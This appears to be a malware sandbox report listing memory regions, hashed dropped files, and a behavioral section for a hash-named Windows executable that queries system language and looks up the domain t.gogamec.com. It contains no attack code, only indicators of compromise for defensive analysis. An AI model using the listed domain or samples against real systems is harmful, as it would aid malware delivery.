memory/3952-67-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3952-64-0x0000000064941000-0x000000006494F000-memory.dmp

memory/3952-63-0x0000000000C70000-0x0000000000CFF000-memory.dmp

memory/3952-62-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/3952-58-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/1084-101-0x0000000005790000-0x00000000057F6000-memory.dmp

memory/1084-99-0x0000000005620000-0x0000000005642000-memory.dmp

memory/3824-104-0x0000000000560000-0x00000000005C8000-memory.dmp

memory/1084-100-0x0000000005720000-0x0000000005786000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h4yl2515.joc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1084-111-0x0000000005800000-0x0000000005B54000-memory.dmp

memory/672-110-0x0000000000290000-0x00000000002AA000-memory.dmp

memory/3824-112-0x0000000004E00000-0x0000000004E76000-memory.dmp

memory/672-115-0x0000000000A50000-0x0000000000A56000-memory.dmp

memory/3824-114-0x0000000004DA0000-0x0000000004DBE000-memory.dmp

memory/3824-125-0x0000000005620000-0x0000000005BC4000-memory.dmp

memory/1084-126-0x0000000005C60000-0x0000000005C7E000-memory.dmp

memory/116-127-0x00000000066C0000-0x000000000670C000-memory.dmp

memory/1428-129-0x0000000000400000-0x0000000000883000-memory.dmp

memory/672-130-0x000000001B1D0000-0x000000001B2D2000-memory.dmp

memory/3952-140-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3952-139-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3952-138-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3952-137-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3952-135-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/3952-131-0x0000000000400000-0x000000000051B000-memory.dmp

memory/116-151-0x0000000007140000-0x0000000007172000-memory.dmp

memory/116-152-0x000000006D1B0000-0x000000006D1FC000-memory.dmp

memory/116-163-0x0000000007420000-0x00000000074C3000-memory.dmp

memory/116-162-0x0000000006760000-0x000000000677E000-memory.dmp

memory/1084-164-0x000000006D1B0000-0x000000006D1FC000-memory.dmp

memory/1064-178-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1064-182-0x0000000005240000-0x000000000534A000-memory.dmp

memory/116-181-0x0000000007B50000-0x00000000081CA000-memory.dmp

memory/1064-184-0x0000000005170000-0x00000000051AC000-memory.dmp

memory/116-183-0x00000000071F0000-0x000000000720A000-memory.dmp

memory/1064-180-0x0000000005110000-0x0000000005122000-memory.dmp

memory/1064-179-0x0000000005630000-0x0000000005C48000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Sat062000ca9aa6.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/1084-185-0x0000000007000000-0x000000000700A000-memory.dmp

memory/116-186-0x0000000007720000-0x00000000077B6000-memory.dmp

memory/116-187-0x00000000076B0000-0x00000000076C1000-memory.dmp

memory/116-208-0x00000000076E0000-0x00000000076EE000-memory.dmp

memory/116-209-0x00000000076F0000-0x0000000007704000-memory.dmp

memory/116-210-0x00000000077E0000-0x00000000077FA000-memory.dmp

memory/1084-211-0x00000000072A0000-0x00000000072A8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ScMeAP.SU

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Users\Admin\AppData\Local\Temp\20L2vNO.2

MD5 4bf3493517977a637789c23464a58e06
SHA1 519b1fd3df0a243027c8cf4475e6b2cc19e1f1f4
SHA256 ccf0f8d1770436e1cd6cdcfa72d79a791a995a2f11d22bdf2b1e9bfbdd6f4831
SHA512 4d094e86e9c7d35231020d97fbcc7d0c2f748d1c22819d1d27dabbb262967800cc326911a7e5f674461d9932e244affe9a01fa9527f53248e5867490e0e09501

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7727e238bcfe2e321072500c68ed0d20
SHA1 dfb774b29dd1621bb8b24fbcc699bae37002e899
SHA256 74d126fa51a276db01dfaf47941be9aea660552c61cd1dfbf43a6159102b72dd
SHA512 2b09f87dcd1291bc347b07fb325eed7a7d79e79d6c1cf106ef12a5d415ceef84385b3233998de167a6eb0e07e3927da1a31bfc8d0f1eba84d5bdf329b1ab8484

C:\Users\Admin\AppData\Local\Temp\ykifDQA.1

MD5 7b25b2318e896fa8f9a99f635c146c9b
SHA1 10f39c3edb37b848974da0f9c1a5baa7d7f28ee2
SHA256 723b3b726b9a7394ac3334df124a2033536b108a8eb87ec69e0a6e022c7dcd89
SHA512 a3b294e93e9d0a199af21ad50af8290c0e0aaa7487019480ca3ffd75aa8ad51c4d33612ec69275e4fa2273ca5e33fdfdf263bb0ce81ad43ce092147118fa8ca6

C:\Users\Admin\AppData\Local\Temp\7TcIneJp.0

MD5 6c83f0423cd52d999b9ad47b78ba0c6a
SHA1 1f32cbf5fdaca123d32012cbc8cb4165e1474a04
SHA256 4d61a69e27c9a8982607ace09f0f507625f79050bdf7143c7fe0701bf1fab8ae
SHA512 e3d1537f4b22ceadfef3b30216b63320b397a179ab9d5f1eb66f93811a2717ee1fb6222989f610acd4c33fae6078c3df510022b5748a4f1d88ebf08c12f9deec

C:\Users\Admin\AppData\Local\Temp\gUVIl5.SCh

MD5 973c9cf42285ae79a7a0766a1e70def4
SHA1 4ab15952cbc69555102f42e290ae87d1d778c418
SHA256 7163bfaaaa7adb44e4c272a5480fbd81871412d0dd3ed07a92e0829e68ec2968
SHA512 1a062774d3d86c0455f0018f373f9128597b676dead81b1799d2c2f4f2741d32b403027849761251f8389d248466bcd66836e0952675adcd109cc0e950eaec85

C:\Users\Admin\AppData\Local\Temp\6h87pfZ.4

MD5 243a3d5a63c4d0f3a18a3d340f50ed8d
SHA1 4b5d7d91fdc7666d131ef4ed7524bdc1b024a009
SHA256 4da1a700d1dd30fa025a3682aa490680099d508a0b64fbdf8bac2f92914628a1
SHA512 64cd601f218c7ace06dd62ad41faf58d829b77f221fa444d2e347f52fa03210584f75448416e4910a0bb2058aafb8aaadcc9e9ea5c353cb29c352c23c6532ab1

C:\Users\Admin\AppData\Local\Temp\FdKD47Ef.i1

MD5 22e51c0e8d96e09cf8571ef2a4f91cfb
SHA1 46f3a3ad48c540816c110c67b8eab824ebeec8c1
SHA256 e296a4b63a6561115cab7809fb27eb85d3db864d59ecbce82b784d52572a83f1
SHA512 40e328acf47cbf6754b29b856e6a17e6cc15cf9b11b9e58b267fb26b14d598e71cefa266b43f552d51d81dca712e5024a77ca09fb1535ae54cb8586e8b5ccc7f

C:\Users\Admin\AppData\Local\Temp\BtDIj1.fYl

MD5 d17564f93bb4a4cf11c46726ea1fe74b
SHA1 84cbff97ff148296bf36898dcf640ad18eb317c9
SHA256 96a4ccf3bc2092c2198cad0beb6a6fdc26db7f59bb82bf4e476bbac6fc783ce0
SHA512 f327cac0e017ebdaa87e1a8ed40d3abfa5a7614250a9759d6ae62f0f7149aa8ee4a26bb74854ef3860ae8911d87b55803d1f4c0fd58d19507ac4b91eebbb48ff

C:\Users\Admin\AppData\Local\Temp\Q_tW.pL

MD5 40ba2d6fcce0565f8d90055a8fb9975b
SHA1 c7529fea938658e19d238200af795533cba13c5c
SHA256 df403d434bdcc3b3604349310c62ca68718f1388a3d9c6155e026ff685b555b6
SHA512 fd8dd7936d96952acaba5f96ff6116b17bc79f770b324945ba966b00e6b3ff6c9f6388bd402d3e5ad40d42a37123416fe904a7d15c749585593caecfcf46b816

C:\Users\Admin\AppData\Local\Temp\jB946RB.I7A

MD5 d4c89c7cabd256ccedd701e27b3fc31a
SHA1 c01e95b983215b9a08c807084185dbd17ccd32aa
SHA256 e7fe376512c6ba9b615d492961ef38a27b14d192b7c9751b75d9004370b5266c
SHA512 1d3d59c17368f3e264241fc5100971b74487d0bdc0e7902081a332314fdc59e07475f1aaeed17cd2bc1f64c59378ebe1b76e83ea046351d6691c647a60cbb421

C:\Users\Admin\AppData\Local\Temp\U56d.r

MD5 4d5164bd007e1af1a6b436b89fc98329
SHA1 808e5215729cff6daf37bfcac7af29e8959a7c26
SHA256 eaeb79cf3f2e99906d1b5f89b92fcb5555117f0a527247b5becbc78cf65cc434
SHA512 f977ced0b42db76bab7d79d35f6dad56bdbbde527ccde0f8810838d5364b89223f9ec673915ac9b0f595bad7251d3d17d1be479c8ed5bf56c19aac8470a6b668

memory/1432-238-0x0000000002280000-0x0000000002482000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XHnbBPN.0kM

MD5 ab06b4a2368530bea1f4a24f7a4042a0
SHA1 4d2f5c0c585eca9589b726d17528d2eb7e8da3bf
SHA256 e53029f24e2d1bf07cac3ba80aad1a0cbff995e2cdc1c32cb74a43a5e8f3fe6e
SHA512 3ad8acdbca7839f7f1c6ce404a767dd8d3cd0d43a8b98100387c5f8e6cf7f5ab6a08fb6a7456a5beea73ab693cbf4e0def91e601d57b1be9dc865de34f65007f

C:\Users\Admin\AppData\Local\Temp\r6f7sE.I

MD5 bd3523387b577979a0d86ff911f97f8b
SHA1 1f90298142a27ec55118317ee63609664bcecb45
SHA256 a7e608f98f06260044d545f7279b8f859f7b7af98ac2b2b79a3cd7ac3b2dac36
SHA512 b37cb8daddb526312f6be439a3cb87fe62b69d44866df708f10eb148455f09f90b0dcee4360c1ae332d3936357fd4c474920aebec5aa8ddb005b617356c3d286

memory/1028-242-0x0000000000400000-0x000000000089B000-memory.dmp

memory/1432-246-0x0000000002B20000-0x0000000002BC5000-memory.dmp

memory/1432-250-0x0000000002BD0000-0x0000000002C62000-memory.dmp

memory/1432-247-0x0000000002BD0000-0x0000000002C62000-memory.dmp

memory/4536-252-0x0000000000400000-0x000000000054C000-memory.dmp

memory/1432-251-0x0000000002280000-0x0000000002482000-memory.dmp

memory/4536-253-0x0000000003090000-0x0000000003135000-memory.dmp

memory/4536-257-0x0000000003140000-0x00000000031D2000-memory.dmp

memory/4536-255-0x0000000003140000-0x00000000031D2000-memory.dmp

memory/1908-258-0x0000000000400000-0x000000000054C000-memory.dmp

memory/1908-264-0x0000000003630000-0x00000000036D5000-memory.dmp

memory/1908-269-0x00000000036E0000-0x0000000003772000-memory.dmp

memory/1908-266-0x00000000036E0000-0x0000000003772000-memory.dmp

memory/1432-275-0x0000000002BD0000-0x0000000002C62000-memory.dmp

memory/4536-282-0x0000000003140000-0x00000000031D2000-memory.dmp

memory/2272-287-0x0000000000400000-0x000000000054C000-memory.dmp

memory/1908-288-0x00000000036E0000-0x0000000003772000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win7-20241010-en

Max time kernel

151s

Max time network

160s

Command Line

"C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe"

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe

"C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe"

C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe

"C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe" -u

Network

Country Destination Domain Proto
US 8.8.8.8:53 t.gogamec.com udp

Files

N/A